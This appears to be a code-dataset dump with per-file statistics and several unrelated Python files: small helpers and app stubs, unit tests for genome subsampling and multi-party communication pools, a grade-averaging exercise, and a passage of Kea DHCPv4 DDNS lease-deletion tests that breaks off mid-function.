| 29.610526 | 87 | 0.678279 | 392 | 2,813 | 4.673469 | 0.153061 | 0.074236 | 0.036026 | 0.037118 | 0.882642 | 0.880459 | 0.838974 | 0.838974 | 0.838974 | 0.81059 | 0 | 0.022667 | 0.200142 | 2,813 | 94 | 88 | 29.925532 | 0.791556 | 0.030928 | 0 | 0.587302 | 0 | 0 | 0.0639 | 0 | 0 | 0 | 0 | 0 | 0.174603 | 1 | 0.079365 | false | 0 | 0.047619 | 0 | 0.126984 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
66e4b6b166be940664b5d53e9c253a32f296e36f | 307 | py | Python | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | 1 | 2021-07-11T05:39:00.000Z | 2021-07-11T05:39:00.000Z | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | null | null | null | vect/showRepresentation.py | ALEJORIOS/vect | 458f2b30049c0d52dd88d98fe009e33661276742 | [
"MIT"
] | null | null | null | def vector(self, raw = False):
return "array({})".format(self.vector) if raw else "{}".format(self.vector)
def matrix(self, raw = False):
if raw:
        return "{}".format(self.mat)
else:
return "\n".join([str(self.mat[i]) for i in range(self.rows)]) | 38.375 | 79 | 0.602606 | 47 | 307 | 3.93617 | 0.425532 | 0.216216 | 0.12973 | 0.162162 | 0.205405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19544 | 307 | 8 | 80 | 38.375 | 0.748988 | 0 | 0 | 0 | 0 | 0 | 0.055195 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dd1e4fa52600df69fab59fb4da4b68691d0ab31e | 27 | py | Python | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | src/main.py | shunw/machine_learn | f4509466e85298566c8d115c0540623c8f38b92f | [
"MIT"
] | null | null | null | print("Hello World Again!") | 27 | 27 | 0.740741 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 27 | 1 | 27 | 27 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
dd781df2fdeb7417a62f9533f2ebdbf8ec82b312 | 83 | py | Python | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 133 | 2019-07-24T11:32:34.000Z | 2022-03-25T02:43:55.000Z | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 396 | 2019-07-24T06:30:19.000Z | 2022-03-24T07:59:07.000Z | apps/_minimal/__init__.py | DonaldMcC/py4web | 116aa9298aef07899eac13e2ea9c3e8a00dd1977 | [
"BSD-3-Clause"
] | 159 | 2019-07-24T11:32:37.000Z | 2022-03-28T15:17:05.000Z | from py4web import action
@action("index")
def index():
return "Hello World"
| 11.857143 | 25 | 0.686747 | 11 | 83 | 5.181818 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.192771 | 83 | 6 | 26 | 13.833333 | 0.835821 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dd88b0096f606e05fdd234788119f204565d358f | 32 | py | Python | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | 1 | 2019-07-26T20:59:47.000Z | 2019-07-26T20:59:47.000Z | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | null | null | null | JupyterHTMLSlides/__init__.py | williamegomezo/JupyterSlides | 403fe15e360eb1d79bf813b923eb569a81ab0934 | [
"MIT"
] | null | null | null | from .core import JupyterSlides
| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
661825e4ea78dc1fbade05205709f505ce4b743c | 8,956 | py | Python | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | genome_sampler/tests/test_subsample_longitudinal.py | thermokarst-forks/genome-sampler | 30a837b42f927d5d85c9edf01e9cbed3d28a9697 | [
"BSD-3-Clause"
] | null | null | null | import unittest
import pandas as pd
import numpy as np
import qiime2
from genome_sampler.subsample_longitudinal import subsample_longitudinal
class TestSubsampleLongitudinal(unittest.TestCase):
_N_TEST_ITERATIONS = 50
def setUp(self):
s1 = pd.Series(['2019-12-31', '2020-01-09', '2020-01-10',
'2019-11-01', '2020-01-11', '2020-02-21',
'2020-02-21', '2020-02-21', '2020-03-15'],
index=[chr(x) for x in range(65, 74)])
s1.index.name = 'id'
s1.name = 'date-md'
self.md1 = qiime2.CategoricalMetadataColumn(s1)
s2 = pd.Series(['2020-01-02', '2019-11-01', '2020-02-21',
'2020-02-21', '2020-02-21', '2020-03-15',
'2020-01-03', '2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09', '2020-01-10', '2020-01-11',
'2020-01-12', '2020-01-13', '2020-01-14',
'2020-01-15', '2020-01-16', '2020-01-17'],
index=[chr(x) for x in range(65, 86)])
s2.index.name = 'id'
s2.name = 'date-md'
self.md2 = qiime2.CategoricalMetadataColumn(s2)
def test_default(self):
sel = subsample_longitudinal(self.md1)
self.assertEqual(sel.inclusion.sum(), 9)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_start_date_in_data(self):
sel = subsample_longitudinal(self.md1, start_date='2019-12-31')
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
self.assertFalse(np.nan in list(sel.inclusion.index))
def test_start_date_not_in_data(self):
sel = subsample_longitudinal(self.md1, start_date='2019-12-30')
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
self.assertFalse(np.nan in list(sel.inclusion.index))
def test_one_sample_per_interval(self):
sel = subsample_longitudinal(self.md1, samples_per_interval=1)
self.assertEqual(sel.inclusion.sum(), 6)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_two_sample_per_interval(self):
sel = subsample_longitudinal(self.md1, samples_per_interval=2)
self.assertEqual(sel.inclusion.sum(), 8)
self.assertEqual(sel.metadata.get_column('date-md'), self.md1)
self.assertEqual(sel.label, 'subsample_longitudinal')
def test_interval_bounds1(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26')
exp_int1_dates = ['2020-01-02', '2020-01-03', '2020-01-04',
'2020-01-05', '2020-01-06', '2020-01-07',
'2020-01-08']
exp_int2_dates = ['2020-01-09', '2020-01-10', '2020-01-11',
'2020-01-12', '2020-01-13', '2020-01-14',
'2020-01-15']
exp_int3_dates = ['2020-01-16', '2020-01-17']
exp_int4_dates = ['2020-02-21']
exp_int5_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 5)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
def test_interval_bounds2(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-27')
exp_int1_dates = ['2020-01-02']
exp_int2_dates = ['2020-01-03', '2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09']
exp_int3_dates = ['2020-01-10', '2020-01-11', '2020-01-12',
'2020-01-13', '2020-01-14', '2020-01-15',
'2020-01-16']
exp_int4_dates = ['2020-01-17']
exp_int5_dates = ['2020-02-21']
exp_int6_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 6)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int6_dates)), 1)
def test_interval_bounds3(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-28')
exp_int1_dates = ['2020-01-02', '2020-01-03']
exp_int2_dates = ['2020-01-04', '2020-01-05',
'2020-01-06', '2020-01-07', '2020-01-08',
'2020-01-09', '2020-01-10']
exp_int3_dates = ['2020-01-11', '2020-01-12',
'2020-01-13', '2020-01-14', '2020-01-15',
'2020-01-16', '2020-01-17']
exp_int4_dates = ['2020-02-21']
exp_int5_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 5)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int5_dates)), 1)
def test_interval_size(self):
for _ in range(self._N_TEST_ITERATIONS):
sel = subsample_longitudinal(self.md2, start_date='2019-12-19',
samples_per_interval=1,
days_per_interval=14)
exp_int1_dates = ['2020-01-02', '2020-01-03', '2020-01-04',
'2020-01-05', '2020-01-06', '2020-01-07',
'2020-01-08', '2020-01-09', '2020-01-10',
'2020-01-11', '2020-01-12', '2020-01-13',
'2020-01-14', '2020-01-15']
exp_int2_dates = ['2020-01-16', '2020-01-17']
exp_int3_dates = ['2020-02-21']
exp_int4_dates = ['2020-03-15']
self.assertEqual(sel.inclusion.sum(), 4)
self.assertEqual(sel.metadata.get_column('date-md'), self.md2)
self.assertEqual(sel.label, 'subsample_longitudinal')
sampled_dates = set(self.md2.to_series()[sel.inclusion].values)
self.assertEqual(len(sampled_dates & set(exp_int1_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int2_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int3_dates)), 1)
self.assertEqual(len(sampled_dates & set(exp_int4_dates)), 1)
def test_seed(self):
sel1 = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26', seed=1)
for _ in range(self._N_TEST_ITERATIONS):
sel2 = subsample_longitudinal(self.md2, samples_per_interval=1,
start_date='2019-12-26', seed=1)
self.assertEqual(list(sel1.inclusion.items()),
list(sel2.inclusion.items()))
| 48.410811 | 75 | 0.567776 | 1,140 | 8,956 | 4.271053 | 0.103509 | 0.10228 | 0.099815 | 0.10269 | 0.865475 | 0.834463 | 0.819881 | 0.813925 | 0.798932 | 0.774286 | 0 | 0.159466 | 0.289303 | 8,956 | 184 | 76 | 48.673913 | 0.605499 | 0 | 0 | 0.5 | 0 | 0 | 0.153975 | 0.022108 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.073333 | false | 0 | 0.033333 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
661cdc9461c78b85fc0ec616f30da630de544b41 | 102 | py | Python | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | 1 | 2022-03-28T05:57:45.000Z | 2022-03-28T05:57:45.000Z | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | null | null | null | Test.py | LovingThresh/CJTeam | ce03e107e0b33ac8132d4d6369fd7f98013e7563 | [
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Conv2D
| 17 | 42 | 0.833333 | 15 | 102 | 5.666667 | 0.533333 | 0.376471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.137255 | 102 | 5 | 43 | 20.4 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b0869f013bcf22d50630af0b973389bfd231a181 | 5,351 | py | Python | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | 2 | 2021-04-09T07:20:12.000Z | 2021-04-23T10:08:52.000Z | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | 2 | 2021-12-03T10:21:33.000Z | 2022-03-31T12:40:21.000Z | tno/mpc/communication/test/test_pool_http_3p.py | TNO-MPC/communication | 5ebf90e3672873cda1c4cc04b94353101fd4f480 | [
"Apache-2.0"
] | null | null | null | """
This module tests the communication between three communication pools.
"""
from typing import Any, Optional, Tuple
import pytest
from tno.mpc.communication import Pool
from tno.mpc.communication.test import ( # pylint: disable=unused-import
event_loop,
fixture_pool_http_3p,
)
@pytest.mark.asyncio
async def send_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Send a message
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the message to send
:param msg_id: the message id to use
"""
await pools[sender].send(f"local{receiver}", message, msg_id)
@pytest.mark.asyncio
async def assert_recv_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Receives a message and validates whether it is in line with the expected message
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the expected message
:param msg_id: the message id of the expected message
"""
res = await pools[receiver].recv(f"local{sender}", msg_id)
assert res == message
@pytest.mark.asyncio
async def assert_send_message(
pools: Tuple[Pool, ...],
sender: int,
receiver: int,
message: Any,
msg_id: Optional[str] = None,
) -> None:
"""
Sends a message and validates whether it is received correctly
:param pools: the communication pools to use
:param sender: the id of the sending party
:param receiver: the id of the receiving party
:param message: the message
:param msg_id: the message id to use
"""
await send_message(pools, sender, receiver, message, msg_id)
await assert_recv_message(pools, sender, receiver, message, msg_id)
@pytest.mark.asyncio
async def test_http_3p_server(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 2, "Hello2!")
await assert_send_message(pool_http_3p, 1, 0, "Hello3!")
await assert_send_message(pool_http_3p, 1, 2, "Hello4!")
await assert_send_message(pool_http_3p, 2, 0, "Hello5!")
await assert_send_message(pool_http_3p, 2, 1, "Hello6!")
@pytest.mark.asyncio
async def test_http_3p_server_2(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 1, "Hello2!")
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
@pytest.mark.asyncio
async def test_http_3p_server_3(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 2, "Hello2!")
await assert_send_message(pool_http_3p, 1, 0, "Hello3!")
await assert_send_message(pool_http_3p, 1, 2, "Hello4!")
await assert_send_message(pool_http_3p, 2, 0, "Hello5!")
await assert_send_message(pool_http_3p, 2, 1, "Hello6!")
await assert_send_message(pool_http_3p, 0, 1, "Hello7!")
await assert_send_message(pool_http_3p, 0, 2, "Hello8!")
await assert_send_message(pool_http_3p, 1, 0, "Hello9!")
await assert_send_message(pool_http_3p, 1, 2, "Hello10!")
await assert_send_message(pool_http_3p, 2, 0, "Hello11!")
await assert_send_message(pool_http_3p, 2, 1, "Hello12!")
@pytest.mark.asyncio
async def test_http_3p_server_msg_id(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools with a message id
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!", "Msg ID 1")
await assert_send_message(pool_http_3p, 0, 1, "Hello2!", "Msg ID 2")
@pytest.mark.asyncio
async def test_http_3p_server_mixed_receive(
pool_http_3p: Tuple[Pool, Pool, Pool]
) -> None:
"""
Tests sending and receiving of multiple messages of varying types between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await send_message(pool_http_3p, 0, 1, "Hello1!")
await send_message(pool_http_3p, 2, 1, b"Hello2!")
await send_message(pool_http_3p, 0, 1, b"Hello3!")
await send_message(pool_http_3p, 2, 1, "Hello4!")
await assert_recv_message(pool_http_3p, 2, 1, b"Hello2!")
await assert_recv_message(pool_http_3p, 2, 1, "Hello4!")
await assert_recv_message(pool_http_3p, 0, 1, "Hello1!")
await assert_recv_message(pool_http_3p, 0, 1, b"Hello3!")
| 34.522581 | 104 | 0.712203 | 800 | 5,351 | 4.535 | 0.115 | 0.077729 | 0.115766 | 0.145259 | 0.858875 | 0.851985 | 0.841786 | 0.801268 | 0.787486 | 0.603087 | 0 | 0.033739 | 0.18576 | 5,351 | 154 | 105 | 34.746753 | 0.798944 | 0.018875 | 0 | 0.518987 | 0 | 0 | 0.075732 | 0 | 0 | 0 | 0 | 0 | 0.392405 | 1 | 0 | false | 0 | 0.050633 | 0 | 0.050633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# vautoencoder/__init__.py (repo: zamlz/dlcampjeju2018-I2A-cube, MIT license)
from vautoencoder.trainer import train, VariationalAutoEncoder
from vautoencoder.network import VAEBuilder
# python/Mundo 1/ex007.py (repo: eduardoranucci/Python-CursoEmVideo, MIT license)
# Reads two grades from one input line and prints their average ("média").
notas = input('Digite duas notas: (Ex: 6.5 84) ').split()
print(f'A média é: {(float(notas[0]) + float(notas[1])) / 2}')
# tests/dhcpv4/ddns/test_ddns_lease_del.py (repo: isc-projects/forge, 0BSD license)
"""DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long

import pytest

import misc
import srv_control
import srv_msg
from forge_cfg import world


def _delete_lease(extra_param=None, exp_result=0):
    cmd = dict(command="lease4-del", arguments={})
    if isinstance(extra_param, dict):
        cmd["arguments"].update(extra_param)
    return srv_msg.send_ctrl_cmd(cmd, exp_result=exp_result, channel='socket')


def _resend_ddns(address, exp_result=0):
    cmd = dict(command="lease4-resend-ddns", arguments={"ip-address": address})
    return srv_msg.send_ctrl_cmd(cmd, exp_result=exp_result, channel='socket')
def _check_fqdn_record(fqdn, address='', expect='notempty'):
    # check new DNS entry
    misc.test_procedure()
    srv_msg.dns_question_record(fqdn, 'A', 'IN')
    srv_msg.client_send_dns_query()
    if expect == 'empty':
        misc.pass_criteria()
        srv_msg.send_wait_for_query('MUST')
        srv_msg.dns_option('ANSWER', expect_include=False)
    else:
        misc.pass_criteria()
        srv_msg.send_wait_for_query('MUST')
        srv_msg.dns_option('ANSWER')
        srv_msg.dns_option_content('ANSWER', 'rdata', address)
        srv_msg.dns_option_content('ANSWER', 'rrname', fqdn)


def _check_address_record(arpa, fqdn='', expect="notempty"):
    misc.test_procedure()
    srv_msg.dns_question_record(arpa, 'PTR', 'IN')
    srv_msg.client_send_dns_query()
    if expect == 'empty':
        misc.pass_criteria()
        srv_msg.send_wait_for_query('MUST')
        srv_msg.dns_option('ANSWER', expect_include=False)
    else:
        misc.pass_criteria()
        srv_msg.send_wait_for_query('MUST')
        srv_msg.dns_option('ANSWER')
        srv_msg.dns_option_content('ANSWER', 'rdata', fqdn)
        srv_msg.dns_option_content('ANSWER', 'rrname', arpa)
def _get_address(mac, fqdn, address):
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', mac)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('yiaddr', address)

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', address)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', fqdn)
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', address)
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', fqdn)


def _get_address_and_update_ddns(mac=None, fqdn=None, address=None, arpa=None):
    # checking if record is indeed empty on start
    _check_fqdn_record(fqdn, expect='empty')
    # getting new address that should also generate DDNS entry
    _get_address(mac, fqdn, address)
    # checking both forward and reverse DNS entries
    _check_fqdn_record(fqdn, address=address)
    _check_address_record(arpa, fqdn=fqdn)
@pytest.mark.v4
@pytest.mark.ddns
def test_ddns4_all_levels_lease4_del_with_dns():
    misc.test_setup()
    srv_control.open_control_channel()
    srv_control.add_hooks('libdhcp_lease_cmds.so')
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.10-192.168.50.10')
    srv_control.config_srv_another_subnet_no_interface('192.168.51.0/24',
                                                       '192.168.51.10-192.168.51.10')
    srv_control.config_srv_another_subnet_no_interface('192.168.52.0/24',
                                                       '192.168.52.10-192.168.52.10')
    # let's get 3 different ddns settings: global, shared-network and subnet
    world.dhcp_cfg.update({"ddns-send-updates": True,
                           "ddns-generated-prefix": "six",
                           "ddns-qualifying-suffix": "example.com"})
    world.dhcp_cfg["subnet4"][1].update({"ddns-send-updates": True,
                                         "ddns-generated-prefix": "abc",
                                         "ddns-qualifying-suffix": "example.com"})
    srv_control.shared_subnet('192.168.50.0/24', 0)
    srv_control.shared_subnet('192.168.51.0/24', 0)
    srv_control.shared_subnet('192.168.52.0/24', 0)
    srv_control.set_conf_parameter_shared_subnet('name', '"name-abc"', 0)
    srv_control.set_conf_parameter_shared_subnet('interface', '"$(SERVER_IFACE)"', 0)
    world.dhcp_cfg["shared-networks"][0].update({"ddns-send-updates": True,
                                                 "ddns-generated-prefix": "xyz",
                                                 "ddns-qualifying-suffix": "example.com"})
    # kea-ddns config
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_forward_ddns('five.example.com.', 'EMPTY_KEY')
    srv_control.add_forward_ddns('three.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('51.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('52.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.start_srv('DNS', 'started', config_set=32)

    # let's get 3 different leases with DNS records
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:01', fqdn='sth4.four.example.com.',
                                 address='192.168.50.10', arpa='10.50.168.192.in-addr.arpa.')
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:02', fqdn='some.five.example.com.',
                                 address='192.168.51.10', arpa='10.51.168.192.in-addr.arpa.')
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:03', fqdn='record.three.example.com.',
                                 address='192.168.52.10', arpa='10.52.168.192.in-addr.arpa.')

    # remove all leases using lease4-del, also removing the ddns entries
    resp = _delete_lease(extra_param={"ip-address": "192.168.50.10", "update-ddns": True}, exp_result=0)
    assert resp["text"] == "IPv4 lease deleted."
    resp = _delete_lease(extra_param={"ip-address": "192.168.51.10", "update-ddns": True}, exp_result=0)
    assert resp["text"] == "IPv4 lease deleted."
    resp = _delete_lease(extra_param={"ip-address": "192.168.52.10", "update-ddns": True}, exp_result=0)
    assert resp["text"] == "IPv4 lease deleted."

    # check that the DNS records were indeed removed; the reverse (PTR) records
    # live under the in-addr.arpa. names, not the fqdns
    _check_fqdn_record("sth4.four.example.com.", expect='empty')
    _check_fqdn_record("some.five.example.com.", expect='empty')
    _check_fqdn_record("record.three.example.com.", expect='empty')
    _check_address_record("10.50.168.192.in-addr.arpa.", expect='empty')
    _check_address_record("10.51.168.192.in-addr.arpa.", expect='empty')
    _check_address_record("10.52.168.192.in-addr.arpa.", expect='empty')

    # try to add back by resending ddns, all should fail
    _resend_ddns('192.168.51.10', exp_result=3)
    _resend_ddns('192.168.50.10', exp_result=3)
    _resend_ddns('192.168.52.10', exp_result=3)
    _check_fqdn_record("sth4.four.example.com.", expect='empty')
    _check_fqdn_record("some.five.example.com.", expect='empty')
    _check_fqdn_record("record.three.example.com.", expect='empty')
    _check_address_record("10.50.168.192.in-addr.arpa.", expect='empty')
    _check_address_record("10.51.168.192.in-addr.arpa.", expect='empty')
    _check_address_record("10.52.168.192.in-addr.arpa.", expect='empty')
@pytest.mark.v4
@pytest.mark.ddns
def test_ddns4_all_levels_lease4_del_without_dns():
    misc.test_setup()
    srv_control.open_control_channel()
